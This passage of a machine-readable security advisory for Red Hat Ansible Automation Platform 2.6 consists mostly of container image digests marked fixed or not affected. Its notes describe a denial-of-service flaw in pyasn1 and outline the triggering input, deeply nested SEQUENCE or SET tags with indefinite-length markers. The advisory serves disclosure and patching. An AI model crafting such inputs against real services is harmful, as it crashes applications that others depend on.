"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448553"
}
],
"notes": [
{
"category": "description",
"text": "An unbounded recursion flaw has been discovered in the pypi pyasn1 library. This uncontrolled recursion occurs when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: pyasn1 Vulnerable to Denial of Service via Unbounded Recursion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
